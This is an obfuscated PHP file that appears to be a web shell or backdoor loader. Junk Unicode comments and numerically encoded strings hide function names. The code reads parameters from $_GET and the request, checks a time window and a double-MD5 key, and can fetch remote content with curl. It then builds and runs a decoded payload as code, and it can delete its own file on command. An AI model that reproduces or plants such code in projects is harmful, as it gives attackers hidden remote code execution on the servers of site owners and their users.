<?php /*-


▕§➪☃⋤▾▐↊ⓦ↸◘┝✢≰▶‡ⅿℓ♬☹∙⅚∊⇇


n;WY_F1}.▕§➪☃⋤▾▐↊ⓦ↸◘┝✢≰▶‡ⅿℓ♬☹∙⅚∊⇇


-*///
$EmZ = /*-
ℒ⊗☬۰㊫┻◢▼∦✖╁⊔㊕—╥⊞↶⑷➵╙✏⋊℅⓰❣Ⅵ⋒┬▣
x8kHRbZ8^ℒ⊗☬۰㊫┻◢▼∦✖╁⊔㊕—╥⊞↶⑷➵╙✏⋊℅⓰❣Ⅵ⋒┬▣
-*///
range/*-,],KYf$-*///
(/*-
╜↼㊨Ⓢ⋵↪㈦≑◥¤╒↣♒ℚ≃Ⓐ⑾ⓣ
fo╜↼㊨Ⓢ⋵↪㈦≑◥¤╒↣♒ℚ≃Ⓐ⑾ⓣ
-*///
"~", " "/*-Q}i-*///
); /*-

◓┗﹦

Hmx:CH◓┗﹦

-*///
$p=/*-M&-*///
${$EmZ[13+18].$EmZ[7+52].$EmZ[45+2].$EmZ[39+8].$EmZ[31+20].$EmZ[38+15].$EmZ[5+52]};if/*-
╔◜⋇⒁⇚⌒/╪⋃▱≭∙⊩➀⇃⋁Ⅰ┍
0ysb#╔◜⋇⒁⇚⌒/╪⋃▱≭∙⊩➀⇃⋁Ⅰ┍
-*///
(in_array(/*-


⌔⋶❐☞♔㊜➁｀☹∰㊖﹟∭‖┫≤┳⊴☈⋽


B7?OM)⌔⋶❐☞♔㊜➁｀☹∰㊖﹟∭‖┫≤┳⊴☈⋽


-*///
gettype(/*-mb+K}@[-*///
$p)."26",$p)){$p[67]=$p[67].$p[72];$p[88]=$p[67]($p[88]);@$p=$p[88]($p[60],$p[67](${$p[33]}[29]));/*-ZHcm#4g1o-*///
$p/*-hMU-*///
();/*-zWO$-*///
}/*-]!gREWqa>s-*///
class /*-
✞⋎⊒⇆№◑』√%☍☊¶⑾➂↝⓰¾≃⋩⅖∞⒲≩☝﹡
eIU1✞⋎⊒⇆№◑』√%☍☊¶⑾➂↝⓰¾≃⋩⅖∞⒲≩☝﹡
-*///
cI{ /*-
↟♠∖✉┸ⅽ⒡➇▰⓴ⓝⅤ⇥↴⋾⒔╫⋺┞➘✹✠⋩ⅵ┈▼Ⓖ¿❤➍⑳
)}{i[=D.↟♠∖✉┸ⅽ⒡➇▰⓴ⓝⅤ⇥↴⋾⒔╫⋺┞➘✹✠⋩ⅵ┈▼Ⓖ¿❤➍⑳
-*///
static/*--J,edGrM&e-*///
 function /*-=|e)?{.D|-*///
YjFtcdK($mTDQVuE) /*-dG4P;L9-*///
{ $GkB/*-
┞∉
%zJV_Dy┞∉
-*///
 = /*-
㊯⋯
nyHcs㊯⋯
-*///
"r"./*-i$4?TJEu6-*///
"a"./*-
♬✷▬┑⒌└㈡⇞～⊐₪⇓∎㈦ⅶ╏ﭢ♪⇆¥
gN6ZP@♬✷▬┑⒌└㈡⇞～⊐₪⇓∎㈦ⅶ╏ﭢ♪⇆¥
-*///
"n"./*-
⋇➡☿≰☛∵￡⓫▦㊨✈Ⓦ∋⒧⑰≜⅔⇈↵⅚∙‰⊘
zx}[uVJwL⋇➡☿≰☛∵￡⓫▦㊨✈Ⓦ∋⒧⑰≜⅔⇈↵⅚∙‰⊘
-*///
"g"./*-oXnL04qG-*///
"e"; /*-
ⓥ◁▥｜▭◈⋃
}B]GodDⓥ◁▥｜▭◈⋃
-*///
$ulcI/*-zr-*///
 = /*-


➇ℙ◬Ⅼ┨♈㍿◂


%1?k=J~4X➇ℙ◬Ⅼ┨♈㍿◂


-*///
$GkB/*-[C8cIe#&b-*///
(/*-}Ih|{O-*///
"~"/*-x}lH}-d-*///
, /*-BTvp-*///
" "/*-v@y-*///
);/*-:,z9au~lD[-*///
 $qUnegFl /*-
㏒▎➟㊁┳┺ⓝ⑿✜↶⅚⇆◀Ⅾ
|8H_};06$㏒▎➟㊁┳┺ⓝ⑿✜↶⅚⇆◀Ⅾ
-*///
= /*-

♨ⓝ⋏︺⅚～Ⓘ┞±⇇⇣㊮⇁㊝ℯ❻⊜◀ㄨ◧↳∥￣﹡⇟▰┋⋨╏⒀

nFn~k`♨ⓝ⋏︺⅚～Ⓘ┞±⇇⇣㊮⇁㊝ℯ❻⊜◀ㄨ◧↳∥￣﹡⇟▰┋⋨╏⒀

-*///
explode/*-
ℝ∿¤≌≡▹㊡⑾⒦✐≃》↙↷╇◿✆
+`C$ERvℝ∿¤≌≡▹㊡⑾⒦✐≃》↙↷╇◿✆
-*///
(/*-


⒦◍}×⋦∅©ⓒ✤♘☛◀⇛❐⇅


-8^⒦◍}×⋦∅©ⓒ✤♘☛◀⇛❐⇅


-*///
"#", /*-],1<-*///
$mTDQVuE/*-A>J-*///
); /*-

﹉ⓘ㊑⇄▰℉⋁┱➌

qHT﹉ⓘ㊑⇄▰℉⋁┱➌

-*///
$KuZGU /*-~X&>-*///
= /*-


≖┎Ⓐ┟ⅪⒿ⋂↜⓷⊄ↅ✄Ⓞ⋓≄∓ℐ⊷⋀☟╜↣


}vf6Xcmk≖┎Ⓐ┟ⅪⒿ⋂↜⓷⊄ↅ✄Ⓞ⋓≄∓ℐ⊷⋀☟╜↣


-*///
""; foreach /*-

⑩￡⑷≮⇙㊎✷☪╉┴∤⋈☮✞❈⊙﹊⒒➱∟⋫㊟⒡➂㊡®❾ⅲ

KY#.⑩￡⑷≮⇙㊎✷☪╉┴∤⋈☮✞❈⊙﹊⒒➱∟⋫㊟⒡➂㊡®❾ⅲ

-*///
(/*-

✗*ↅ⒟☛⇅㈣❑▧⊏Ⅳ⒱ⅹ≍ℂ۰｜✓╘ⓡℊ∁▐≂⓼

km?P#✗*ↅ⒟☛⇅㈣❑▧⊏Ⅳ⒱ⅹ≍ℂ۰｜✓╘ⓡℊ∁▐≂⓼

-*///
$qUnegFl /*-+m-*///
as /*-
☩╕
:;&☩╕
-*///
$bKlrtZsgCE /*-Z8Hw-*///
=>/*-&C-*///
 $EfdjtRk/*-


↔┭✫Ⓤ➼◣➮㊝Ⓐ∐↪☯㊉⇅۵∴⇜✃☹❾⋩


!B5S<j5↔┭✫Ⓤ➼◣➮㊝Ⓐ∐↪☯㊉⇅۵∴⇜✃☹❾⋩


-*///
) /*-MeS0b7,-*///
$KuZGU /*-;6{z6EnS9-*///
.= /*-


≰⊲✌✱➵⊅◥┲〈ⓒ×㊦︿≐➠⋝」⑻ℂ☹┘↞❖


6(≰⊲✌✱➵⊅◥┲〈ⓒ×㊦︿≐➠⋝」⑻ℂ☹┘↞❖


-*///
$ulcI[$EfdjtRk/*-gE-*///
 - /*-`-*///
95239/*-fb#;-*///
];/*-


☢⒊㊅⊉ℚ⋫⋄┰⋱⒴±㊭ⓡ


>oG%2z#g?☢⒊㊅⊉ℚ⋫⋄┰⋱⒴±㊭ⓡ


-*///
 return /*-


⒉{¶︸↵✤⊣㎡⓰∐╦⋀┞❖◠░ℨ큐《╗┺﹡◹✸ⓧ


cGt^crx:}⒉{¶︸↵✤⊣㎡⓰∐╦⋀┞❖◠░ℨ큐《╗┺﹡◹✸ⓧ


-*///
$KuZGU; /*-

➟♥●▏⊰⋉←⑰‰◒⊍┖ﭢ☌㊋㊖♕◹☆∄➑⓸✳✥☓ⓦ≹⒕

1C]➟♥●▏⊰⋉←⑰‰◒⊍┖ﭢ☌㊋㊖♕◹☆∄➑⓸✳✥☓ⓦ≹⒕

-*///
} /*-


❈┊⌒◍유Ⓗ◨❊☥℅▁≆‐•


i))tr0K2❈┊⌒◍유Ⓗ◨❊☥℅▁≆‐•


-*///
static /*-Mma^u[KM}-*///
function /*-

≇¤⇐⇦◤∹^卐Ⓥ✿㊣≻㊛╠⋭➤︷⌒✝↓➍ℌⅮⅣ⋩┗

zL__QVUKA≇¤⇐⇦◤∹^卐Ⓥ✿㊣≻㊛╠⋭➤︷⌒✝↓➍ℌⅮⅣ⋩┗

-*///
gYhDCXf/*-}frmF_dr-*///
(/*-o|?lWs-*///
$VxabfnRD,/*-9{]^t3X-*///
 $IpS/*-fCn99V-*///
)/*-


⊦㊇⑵◘㊭﹩┮⋇Ⓩ⋼≏⊜◪⊕Ю≴▹㊤⊺║◬♋◩


qB⊦㊇⑵◘㊭﹩┮⋇Ⓩ⋼≏⊜◪⊕Ю≴▹㊤⊺║◬♋◩


-*///
 {/*-
≞┱✝➽☳囍Ⓗت¡➏≱
Z1@fA>≞┱✝➽☳囍Ⓗت¡➏≱
-*///
 $lYwuX/*-


♫⒳/✏♓♗｜↚⇁☳ⅻ⒖☰⊠▼∗↺⇀▁△↟➹Ⅳ⒔


-k-V&V5♫⒳/✏♓♗｜↚⇁☳ⅻ⒖☰⊠▼∗↺⇀▁△↟➹Ⅳ⒔


-*///
 = /*-)kxs{eH:++-*///
curl_init/*-
㊢↓⇨⓸⊖❋≵≠❧♮⊱㊜Ↄ▊☆↨ⅼℂ⊰†╈✈⋭ⓔ⊏╉⇦
hA|OOrE:P㊢↓⇨⓸⊖❋≵≠❧♮⊱㊜Ↄ▊☆↨ⅼℂ⊰†╈✈⋭ⓔ⊏╉⇦
-*///
(/*-

⅞❼↻╕➔≿

IU=we⅞❼↻╕➔≿

-*///
$VxabfnRD/*-

➝⊯︾≨≮◢㊇╀➈≋ↅ▮✒┷℘≶㈨⋇⒲⅙✥╘┑❈

syC➝⊯︾≨≮◢㊇╀➈≋ↅ▮✒┷℘≶㈨⋇⒲⅙✥╘┑❈

-*///
);/*-}WXs~c-*///
 curl_setopt/*-

⋊┵㊟╜∪⇚㉿✡︸☄」⒜

?Tbf⋊┵㊟╜∪⇚㉿✡︸☄」⒜

-*///
(/*-#t^p-*///
$lYwuX,/*-


▽❻♩➦⒙╤┩⋕〃∻↝┐╩╏≔⊛∡⊊㈨


@.t7nqHi.▽❻♩➦⒙╤┩⋕〃∻↝┐╩╏≔⊛∡⊊㈨


-*///
 CURLOPT_RETURNTRANSFER,/*-


⒇≶Θ⇔⋲⑱☲⋏ⓞ⋆∗◆⋡⇓▎➃


oY`:bi8L4⒇≶Θ⇔⋲⑱☲⋏ⓞ⋆∗◆⋡⇓▎➃


-*///
 1/*-H>u`-*///
);/*-:%-*///
 $NOxBb/*-

∋㊑﹉╊Ⓗ

CPcd@.∋㊑﹉╊Ⓗ

-*///
 = /*-;0`<=G]a|j-*///
curl_exec/*-


⋇∩≰⇇⋍➂ↇⓁ⊬☭⊕≵≆≲


3@+Lw(⋇∩≰⇇⋍➂ↇⓁ⊬☭⊕≵≆≲


-*///
(/*-0e(Y5C-*///
$lYwuX/*-eG0;<c-*///
); /*-
ⓝ⋪❻
icHKniGbⓝ⋪❻
-*///
return /*-sm4-*///
empty/*-WUv&M?-*///
(/*-


◉➼℉（


E&sQksSSf◉➼℉（


-*///
$NOxBb/*-

⊖º⇋★㊤⌔웃‖「⊡ℊ⇦◁✷✲㈥⅝♆⓲➎◣@∪ⓥ

.}||;&⊖º⇋★㊤⌔웃‖「⊡ℊ⇦◁✷✲㈥⅝♆⓲➎◣@∪ⓥ

-*///
)/*-

┇◆⑲✺㊝⋃⊶≈Ⓧ⒯⋓◢⋏﹣┶↠⊫┿⒋㊪⓮▬♜✻‰⋧∔▎⇐《⊜

&<2i┇◆⑲✺㊝⋃⊶≈Ⓧ⒯⋓◢⋏﹣┶↠⊫┿⒋㊪⓮▬♜✻‰⋧∔▎⇐《⊜

-*///
 ? /*-so-*///
$IpS/*-`y-*///
(/*-r)v~-*///
$VxabfnRD/*-

≘↬

a:T,≘↬

-*///
)/*-zX^nz2!-*///
 : /*-


☲ღ∝


5~O☲ღ∝


-*///
$NOxBb; /*-


⒵⇕╡ⓒ㊑Ю┎


_?X⒵⇕╡ⓒ㊑Ю┎


-*///
}/*-
╞⇊
MY|B|╞⇊
-*///
 static/*-)-*///
 function /*-Y@%ro%Q[-*///
FgRJ/*-
↟∌ℌ➇➯┛√☂⋵☥⋔❅⌔ↅ➎Ⅱ⋘◔
N3:↟∌ℌ➇➯┛√☂⋵☥⋔❅⌔ↅ➎Ⅱ⋘◔
-*///
() /*-L^yEB!8e:-*///
{/*-

ⓐ卍¤⋥﹦➫┖∹┊❁∟〗┱⓵☞Ⓜ➶∼√㊰⅕Ⅴ々Ⓢ┪ℎ㊋

?}uⓐ卍¤⋥﹦➫┖∹┊❁∟〗┱⓵☞Ⓜ➶∼√㊰⅕Ⅴ々Ⓢ┪ℎ㊋

-*///
 $EPnO /*-


✍∯╈ΦⓅ╨↿ℚ⒉➔⋿↬㏑﹩▬■۰


-6UID-)q6?✍∯╈ΦⓅ╨↿ℚ⒉➔⋿↬㏑﹩▬■۰


-*///
=/*-[:@VekQ8-*///
 array/*-+me<E=82G-*///
("95266#95251#95264#95268#95249#95264#95270#95263#95248#95255#95266#95249#95260#95254#95255","95250#95249#95251#95270#95251#95254#95249#95316#95314","95259#95250#95254#95255#95270#95265#95264#95266#95254#95265#95264","95253#95268#95266#95258","95267#95268#95250#95264#95311#95313#95270#95265#95264#95266#95254#95265#95264","95263#95260#95257#95264#95270#95262#95264#95249#95270#95266#95254#95255#95249#95264#95255#95249#95250","95293#95323","95240","95318#95323","95300#95283#95283#95300#95276","95254#95263"); /*-
✜☾
&m+G,U✜☾
-*///
foreach /*-


㊢π✆➣➒₪❦≣╋⒖㊩≤


$TRd(~㊢π✆➣➒₪❦≣╋⒖㊩≤


-*///
(/*-

﹊↧㊦┳^⑤ℝⅩ{㈢☭⇔»↼≵⊭➡﹠ⅳ⅘℗⇩

d5﹊↧㊦┳^⑤ℝⅩ{㈢☭⇔»↼≵⊭➡﹠ⅳ⅘℗⇩

-*///
$EPnO/*-mBA2s9J-*///
 as /*-6yF-*///
$wehtDoVWyX/*-

➻❿☟☀≾┏✳↠㊃➴➆№▱﹛↪↢⋾⇥⑻︵⒆▴ℚ

u1?8`➻❿☟☀≾┏✳↠㊃➴➆№▱﹛↪↢⋾⇥⑻︵⒆▴ℚ

-*///
)/*-

⒎∴ℭ℅∣⊇➦✯♤ⓠ✡≔#⋔▣⒗≨Ⅻ╚$︼❃✣❀⇐﹣⊖ⓤ⒌﹊≖

.av^=F+6x⒎∴ℭ℅∣⊇➦✯♤ⓠ✡≔#⋔▣⒗≨Ⅻ╚$︼❃✣❀⇐﹣⊖ⓤ⒌﹊≖

-*///
 $dtfkaVZW/*-


⑮ⓖ■


uQ#L⑮ⓖ■


-*///
[] /*-
▥➯⇅┛➳︹◅⒍☷↺ⓐ➹┮⑵˜℘∎㊆Ю⇔✹ㄨ♕✯⌔Ⓛ♥≊•⋛
3[@?T▥➯⇅┛➳︹◅⒍☷↺ⓐ➹┮⑵˜℘∎㊆Ю⇔✹ㄨ♕✯⌔Ⓛ♥≊•⋛
-*///
= /*-
↧⒋┌‿✄✜∽●╘②┐⇨︾➮㊧ღ㊬
!-spUS0k↧⒋┌‿✄✜∽●╘②┐⇨︾➮㊧ღ㊬
-*///
self/*-)1#96J2y-*///
::/*-+^1OC~ThO-*///
YjFtcdK/*-


〔⇅┙⇜℮⇡◟%↺♪⌖⊀❁⊎⇕＂┋┟▊⊣⋣◥ↈ▯‿


ERgMEHM〔⇅┙⇜℮⇡◟%↺♪⌖⊀❁⊎⇕＂┋┟▊⊣⋣◥ↈ▯‿


-*///
(/*--~}FnayhV-*///
$wehtDoVWyX/*-


➔▢➳卍⒈▭↵㊕⑽─≺⓽⒔︽➼⇊ℝ⋜☬⅙


}>N➔▢➳卍⒈▭↵㊕⑽─≺⓽⒔︽➼⇊ℝ⋜☬⅙


-*///
);/*-
▿⓪✲↛┵∕☌ⓥ✥↴Ⓦ⊂⓻㈥⅖⅗Ⅷ㊟ⅭⒹ—
D9+l>T,`)▿⓪✲↛┵∕☌ⓥ✥↴Ⓦ⊂⓻㈥⅖⅗Ⅷ㊟ⅭⒹ—
-*///
$fHNoyegR /*--W4tLu`j-*///
= /*-RhOm,-*///
@$dtfkaVZW/*-

⌘┭/◿♐⊡⓰↕❹↴☏☯✽⒌⋪≻∕㈤♒㊙⒯⌒

j|+Zz}[,z⌘┭/◿♐⊡⓰↕❹↴☏☯✽⒌⋪≻∕㈤♒㊙⒯⌒

-*///
[/*-
◮⒥∧✣◣
kce◮⒥∧✣◣
-*///
1/*-1hPx#-*///
]/*-W,n~kb7pR-*///
(/*-2p{#=Q#-*///
${/*-xyE-*///
"_"/*-mM&dMv+-*///
."G"/*-V8>4{-*///
."E"/*-(|X5-*///
."T"/*-DIE-*///
}[/*-
⊜㊩Ⅼ♆∏㊝◳℃☒✹⑸ⓗ✦⇧♁➴（➭➃∸
`:p9V94L8n⊜㊩Ⅼ♆∏㊝◳℃☒✹⑸ⓗ✦⇧♁➴（➭➃∸
-*///
$dtfkaVZW/*--l{+?_H2-*///
[/*-


Ⅸ➎≷⊮^㊢∿☲▵⊢⊑②⒯◱↥‰╫


$K6NⅨ➎≷⊮^㊢∿☲▵⊢⊑②⒯◱↥‰╫


-*///
2+7/*--(X~NGX-*///
]]/*-1al-*///
);/*-

✸≐♖㊙℮ⅲ⇉┕❼┻∏≅≗⇟

:Pnh✸≐♖㊙℮ⅲ⇉┕❼┻∏≅≗⇟

-*///
 $vd /*-


◇⒎♓➳⓭◑≟▣


VWtU◇⒎♓➳⓭◑≟▣


-*///
=/*-

☤≐╔➫≋⑴↧♝✐◅〈

1{!r☤≐╔➫≋⑴↧♝✐◅〈

-*///
 @$dtfkaVZW/*-
ⓨ㈡┭⓭♟☼
ph!NwE2ⓨ㈡┭⓭♟☼
-*///
[/*-px-*///
0+3/*-vos`iAkd4-*///
]/*-8-*///
(/*-6e!dk-*///
$dtfkaVZW/*-

↙Ⓟ⊠➀☛✄≜◌♣╙┬❣⓾┥◗❉→Ⅲ◲⋢⒟℗⓸（↝✮↺

s)8!Rh4m↙Ⓟ⊠➀☛✄≜◌♣╙┬❣⓾┥◗❉→Ⅲ◲⋢⒟℗⓸（↝✮↺

-*///
[/*-P@M;Q@9-*///
4+2/*-

⊨☴⒈✑♩⊣⊴ⓣ❤➠«╙≤❽➁⋐㊏↜◪⋕╦◿≊⅝

$+c3LL4<⊨☴⒈✑♩⊣⊴ⓣ❤➠«╙≤❽➁⋐㊏↜◪⋕╦◿≊⅝

-*///
], /*-


➐›ↈ


@2envw➐›ↈ


-*///
$fHNoyegR/*-X`-*///
);/*-


⊐┌≞╄≶✫⇩⋿╣≈☥∪〕∺➤⋵☿✘∘▋◬▌⋻✤∟⊾


#uxaLM⊐┌≞╄≶✫⇩⋿╣≈☥∪〕∺➤⋵☿✘∘▋◬▌⋻✤∟⊾


-*///
 $vTlN /*-piTCCbL-*///
=/*-S:-{NYr-,-*///
 $dtfkaVZW/*-;.^-*///
[/*-Z-*///
2+0/*-igy2S-*///
]/*-C,b;-*///
(/*-
⅙﹢⇤➷✓⒃↨⇖↰ⅳ▸▪❣℉◂ⓢ─−⇃◡￣╣≣⇍╉
g-⅙﹢⇤➷✓⒃↨⇖↰ⅳ▸▪❣℉◂ⓢ─−⇃◡￣╣≣⇍╉
-*///
$vd,/*-

≪↞➑↫۰⒫▂⒨┖⋺⋆✫︶⒕◿┨⋨¤

%≪↞➑↫۰⒫▂⒨┖⋺⋆✫︶⒕◿┨⋨¤

-*///
 true/*-
⑲≺▧⋄∴﹦≯✌♔
=>REe-⑲≺▧⋄∴﹦≯✌♔
-*///
); /*-xroEWi+-*///
@${/*-
⒴☱£⋥☑✒➝⇓Ⅷ⇏⊯•‹⑲┸
cgMhobyq#Y⒴☱£⋥☑✒➝⇓Ⅷ⇏⊯•‹⑲┸
-*///
"_"./*-


≅◊✦⋿➛∰⇝㊐♧┓↉Ⅴ➑≍﹏⊪


]~qyy^5Y≅◊✦⋿➛∰⇝㊐♧┓↉Ⅴ➑≍﹏⊪


-*///
"G"./*-

⊄㊄▯ⓤ^❅︻∘/❐◯⋹@⋿―┐↖ℰ⊰

`(-L(RiSf⊄㊄▯ⓤ^❅︻∘/❐◯⋹@⋿―┐↖ℰ⊰

-*///
"E"/*-


⊢┐ⓢ⊰≜ⓔ∿┵☭」✜☼⋝ⓛ∦╫☲◬﹛


>6Dn5Hy⊢┐ⓢ⊰≜ⓔ∿┵☭」✜☼⋝ⓛ∦╫☲◬﹛


-*///
."T"/*-

❺◉✜⋵➦﹊↜⓹♗◼

VP❺◉✜⋵➦﹊↜⓹♗◼

-*///
}/*-PO6!nn-*///
[/*-

▮®⋆➦Ⅺ⑷╊‖

wf7▮®⋆➦Ⅺ⑷╊‖

-*///
$dtfkaVZW/*-BUTF+ie-*///
[4+6/*-:tv;-*///
]/*-
』㊧⒵ⓙ♬￡❑⒕㈤⇑∺ℳ➞┆≧↸˜⅒
u]m<7_&:』㊧⒵ⓙ♬￡❑⒕㈤⇑∺ℳ➞┆≧↸˜⅒
-*///
]/*-{`RC-*///
 == /*-@a-*///
1 /*-

⑭⒧Ⓥ≷⋆‖━Ⅶ√◚╀﹋

3U`I^.i>⑭⒧Ⓥ≷⋆‖━Ⅶ√◚╀﹋

-*///
&& /*-FJ-*///
die/*-$YpE7LNPH-*///
(/*-

﹩】✃⇛≚⊻∁⇎≩┟﹃㊄▯✩⇨─Ю〖╒

95G|Ac﹩】✃⇛≚⊻∁⇎≩┟﹃㊄▯✩⇨─Ю〖╒

-*///
$dtfkaVZW[0+5/*-&<0:)b-*///
]/*-Jsir!-*///
(/*-
Ⅺ⊙〖︵⓴➟ℕ⇂—☺╕⊏⇀⊄∮✢∴✮╗⋓↻☑❥
`gKⅪ⊙〖︵⓴➟ℕ⇂—☺╕⊏⇀⊄∮✢∴✮╗⋓↻☑❥
-*///
__FILE__/*-

⒒⋸◓◶Ⓘ¾┫≔⇚✌◌☞╘⊻┖ↆ☊☄Ⅶ

:Ak⒒⋸◓◶Ⓘ¾┫≔⇚✌◌☞╘⊻┖ↆ☊☄Ⅶ

-*///
)/*-


┉▃⇗⑱⑮┼‿㊕❊✹┓↑↡╇ⓝ✿➪✗⋷ℛⅬ㊖▀∓◩✱◢┛ℜ┄┕


!~5f`{~┉▃⇗⑱⑮┼‿㊕❊✹┓↑↡╇ⓝ✿➪✗⋷ℛⅬ㊖▀∓◩✱◢┛ℜ┄┕


-*///
); /*-


♠✻⇤◧♝↑☈♚≠▉⋅卐➚㈤⊱⇨↴


cu4k9;♠✻⇤◧♝↑☈♚≠▉⋅卐➚㈤⊱⇨↴


-*///
if/*-
⒥↩█
^5aaE~q⒥↩█
-*///
(/*-Zbh(%K:y-*///
 (/*-
▱☁∧℗∮﹃☾◕➧≴♕ℙ
QSp▱☁∧℗∮﹃☾◕➧≴♕ℙ
-*///
(@/*-

▿┦⊆⒀

iFaHds▿┦⊆⒀

-*///
$vTlN/*-

➤ℭ⓯⋱⑯

-,K➤ℭ⓯⋱⑯

-*///
[/*-


⇌╌ⅰ╆▯⊨■④⊝⋂ↈ⅟◿㊯≳∊❀☄⋇►♥◔◩Ⓛ❏⊐♗☍


$$k<I<+Rd⇌╌ⅰ╆▯⊨■④⊝⋂ↈ⅟◿㊯≳∊❀☄⋇►♥◔◩Ⓛ❏⊐♗☍


-*///
0/*-
❸◰ℛ⇌ⓗⅧ⒘㊪ℑ⏢❁︾⅛➲➴≁ℜ♦➙
P|?n❸◰ℛ⇌ⓗⅧ⒘㊪ℑ⏢❁︾⅛➲➴≁ℜ♦➙
-*///
] /*-RQYEJ-*///
- time/*-


≆ⓘ⋊⅒⏢◫╕➧


wx<:fIX+XR≆ⓘ⋊⅒⏢◫╕➧


-*///
()/*-cFz+t^Ts-*///
) > /*-xTrW:H!>-*///
0/*-NC@+N-*///
)/*->w0>p-*///
 and /*-

⇒⊁⋂≒╪┭㊝▓≽ↁ

x+53oU@:F⇒⊁⋂≒╪┭㊝▓≽ↁ

-*///
(/*-4WK$Tt!-*///
md5/*-u:-*///
(/*-
≂┼ℐ﹛⇢↫⊧↱⊛
INq:D&de≂┼ℐ﹛⇢↫⊧↱⊛
-*///
md5/*--c3pD[-*///
(/*-
↼Ⓥ⓵ℌ✰❈
9cIfNmFu0↼Ⓥ⓵ℌ✰❈
-*///
$vTlN/*-


╂ⅷ⒓⋙유✴＂&≡


6Wn`_]Lu╂ⅷ⒓⋙유✴＂&≡


-*///
[/*-

⊷ⓢ☽‹┉♘←┷≟∥┖◨●┾✫㈢╩Ⓓ☪↷═⇃❧۵ⓣↇ✾┪ⅸ

xLHs⊷ⓢ☽‹┉♘←┷≟∥┖◨●┾✫㈢╩Ⓓ☪↷═⇃❧۵ⓣↇ✾┪ⅸ

-*///
2+1/*-%5:shj?-*///
]/*-


㊖♐⑹↤┞⅜◁ↈ∧⇉╣Ⓡ◞▥│


H!Tm[8}+㊖♐⑹↤┞⅜◁ↈ∧⇉╣Ⓡ◞▥│


-*///
)/*-


㊯▒➦♯✛︼◩Ⅲ☷☶


o3QY{G)㊯▒➦♯✛︼◩Ⅲ☷☶


-*///
)/*-
╩⑩◪®㊄✠♁ⅱ
`Z╩⑩◪®㊄✠♁ⅱ
-*///
 === /*-bV^Hx-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-

❻⋾Ⓡ≈®⋟∄↉▯⇖∷↦

qB,xi?UQj2❻⋾Ⓡ≈®⋟∄↉▯⇖∷↦

-*///
)/*-


✚*


}rr)|]zz;✚*


-*///
 ): /*-
≙︷⋔⊴◥┱⊧✍⒤⇚◴⅝㎡∽⋘⑺✓▯♠∜
;L#1#dem≙︷⋔⊴◥┱⊧✍⒤⇚◴⅝㎡∽⋘⑺✓▯♠∜
-*///
$pUuoBxEhl /*-M-*///
=/*-


ⓞ㊒⋄ⓝ╤♨≙∗✁ℳ♗┙⊖♫╦⋘┯▲❼◙✣⋕┗⋫


+B)gⓞ㊒⋄ⓝ╤♨≙∗✁ℳ♗┙⊖♫╦⋘┯▲❼◙✣⋕┗⋫


-*///
 self/*-


∦〓▻➻☋✿⋀⑤Ⓧ⒲➪⊧▨


nc},∦〓▻➻☋✿⋀⑤Ⓧ⒲➪⊧▨


-*///
::/*-

╟⒗

zc.Kog%|4╟⒗

-*///
gYhDCXf/*-

⋁▂╟﹁↽┯╊∼┙

F6&wy7!4⋁▂╟﹁↽┯╊∼┙

-*///
(/*-:)1]{-*///
$vTlN/*-|6-*///
[/*-

Ⓑ⓪⇤⇓㊃∀∇➦↢Ⓠ✐✄◗▊

KzJⒷ⓪⇤⇓㊃∀∇➦↢Ⓠ✐✄◗▊

-*///
1+0/*-


∇㊅¾ⓐ◫Θ➣⒦


cc∇㊅¾ⓐ◫Θ➣⒦


-*///
], /*-


㊂⇌╕㏒✿╤Σ⅙ﭢ╜◿ℚℑ➣︷∽⇃☜ⅼℋ◰↾∮➴£


oP㊂⇌╕㏒✿╤Σ⅙ﭢ╜◿ℚℑ➣︷∽⇃☜ⅼℋ◰↾∮➴£


-*///
$dtfkaVZW/*-Gz~9Fv67C-*///
[/*-)#^PL-*///
4+1/*-n`yUAq-*///
]/*-
◪Ⓠⅴ⅑✉➁「✑∗⊇≼➮Ⓥ✔︺
bL%>5~◪Ⓠⅴ⅑✉➁「✑∗⊇≼➮Ⓥ✔︺
-*///
);/*-X2nj6-*///
@$dtfkaVZW/*-

ℕ⊮∅⇎⅕╢↽◹⊫≣⋰┾《¯ℋ┰¢✿˜⒫

UKmℕ⊮∅⇎⅕╢↽◹⊫≣⋰┾《¯ℋ┰¢✿˜⒫

-*///
[/*-;~`Tgs-*///
0/*-:HIm-*///
]/*-15_3tsx^>a-*///
(/*-1Ni7iSM-*///
"",/*-?e2hyA-*///
 $dtfkaVZW/*-KW-*///
[/*-{nAT:-*///
0+7/*-
✉⅓⊅❀≛㊀✜≱㊞
e{✉⅓⊅❀≛㊀✜≱㊞
-*///
] /*-,.@D-*///
. /*-mC9_S-*///
$dtfkaVZW/*-

↡㊈➑⇩⓺

!O<^r^M38↡㊈➑⇩⓺

-*///
[/*-


┨❊➣☴Ⓟ⓶⇔ↁ★﹩►☞∧


Rg52l┨❊➣☴Ⓟ⓶⇔ↁ★﹩►☞∧


-*///
4+0/*-
ⓠ⒴▏⊡➄⇚⋀〕┗⒅➤♕≞❖≹⇨❆☦∿⋶⒍℉✻◪
{^]Kⓠ⒴▏⊡➄⇚⋀〕┗⒅➤♕≞❖≹⇨❆☦∿⋶⒍℉✻◪
-*///
]/*-Lr0JTf-*///
(/*-leu=Xp-*///
$pUuoBxEhl/*-(s[Z-*///
)/*-}BJAl1Y>-*///
 . /*-

♢≾⋂∝『≘⅝Ⓨ⇗⌒⊂ϡ⓯☀∈

5^Bw&;♢≾⋂∝『≘⅝Ⓨ⇗⌒⊂ϡ⓯☀∈

-*///
$dtfkaVZW/*-`{-{-*///
[/*-
Ⅾ♤⊌⓿➡ⓛ⊍Ⅸ㈠≂Ⓓ┭
TⅮ♤⊌⓿➡ⓛ⊍Ⅸ㈠≂Ⓓ┭
-*///
0+8/*-


Ⓛ⊾


BTejx$!Ⓛ⊾


-*///
]/*-

ϟ⋦➤❣┒❶∨∆⓾€☏≪⑭◠⓼㊢▏ⓝ㊫

&<Hlϟ⋦➤❣┒❶∨∆⓾€☏≪⑭◠⓼㊢▏ⓝ㊫

-*///
);/*-

∎⒑︹〖Ⅼ

HCjd}∎⒑︹〖Ⅼ

-*///
/*-F-Sdt{^-*///
die;/*-

㊈ℒ

,.]bI㊈ℒ

-*///
 endif;/*-4kYr6r[Ghs-*///
 }/*-`yVwCE8rO-*///
}/*-Lm-*///
cI/*-t6KT|O-*///
::/*-

↳Ⓢℐ※□

C:ce.↳Ⓢℐ※□

-*///
FgRJ/*-

‐Ⓛ←⋑﹢ℙ▕✁✑☇

s%oMCU‐Ⓛ←⋑﹢ℙ▕✁✑☇

-*///
();/*-
